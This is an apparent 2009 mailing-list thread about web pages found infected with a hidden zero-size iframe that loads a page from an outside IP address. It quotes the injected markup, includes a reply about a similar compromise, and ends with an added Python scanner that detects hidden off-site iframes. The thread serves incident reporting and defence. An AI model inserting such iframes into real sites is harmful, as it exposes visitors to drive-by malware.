On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg <b...@wins.net> wrote:
> We just discovered what we suspect is malicious code appended to all
> index.html files on our web server as of the 11:00 central time hour today:
>
> src="http://77.92.158.122/webmail/inc/web/index.php"
> style="display: none;" height="0" width="0"></iframe>
> <iframe src="http://77.92.158.122/webmail/inc/web/index.php"
> style="display: none;" height="0" width="0"></iframe> </body> </html>
>
> IP address resolves to mail.yaris.com; couldn't find any A/V site
> references to this.
>
> Google search reveals some Chinese sites with references to the URL today,
> but nothing substantial in the translation.
>
> Just a heads up for folks; we have a team investigating...
>
> Russell Berg
> Dir - Product Development
> Airstream Communications
> b...@wins.net
> 715-832-3726
>

I've run into this sort of attack before, where they change the page to load
content from elsewhere; but I couldn't figure out how they managed to write to
the sites' pages. They were hosted on a commercial webhost, and so if it was a
compromised host (which seemed like the only possibility to me), that didn't
speak well for the hosting company. We were having issues with the company
anyways, though; so I took down the site, sanitized the pages (and removed a
bunch of junk), and put the site back up with another company. But if you
figure out how they got write access to a static website, I'd love to hear it.

-N.
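A way to sweep a web root for the pattern reported in this thread, an invisible iframe pointing at an off-site host. This is an added example, not part of either message; the function names, the `own_hosts` allow-list and the sample page with its 203.0.113.5 documentation address are constructed for illustration.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one visible local frame, one hidden frame on the
# site's own host, and one hidden off-site frame like the one in the report.
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe src="/map.html" height="300" width="400"></iframe>
<iframe src="http://www.example.org/stats" style="display:none"></iframe>
<iframe src="http://203.0.113.5/inc/index.php" style="display: none;" height="0" width="0"></iframe>
</body></html>
"""

class HiddenIframeFinder(HTMLParser):
    """Collect <iframe> tags that a visitor would never see."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip().lower() for k, v in attrs}
        style = a.get("style", "").replace(" ", "")
        zero = all(a.get(d) in ("0", "0px") for d in ("height", "width"))
        if zero or "display:none" in style or "visibility:hidden" in style:
            src = dict(attrs).get("src") or ""
            self.hits.append({"src": src, "line": self.getpos()[0],
                              "host": urlparse(src).hostname})

def find_hidden_iframes(html, own_hosts=()):
    """Return hidden iframes whose src names a host outside own_hosts."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    return [h for h in finder.hits if h["host"] and h["host"] not in own_hosts]

def scan_tree(root, own_hosts=()):
    """Walk a web root and map each affected .html/.htm path to its hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read(), own_hosts)
                if hits:
                    report[path] = hits
    return report
```

A scan like this only finds the symptom; comparing the modification times of the flagged files against FTP, SSH and web server logs is what helps answer how the pages were written to.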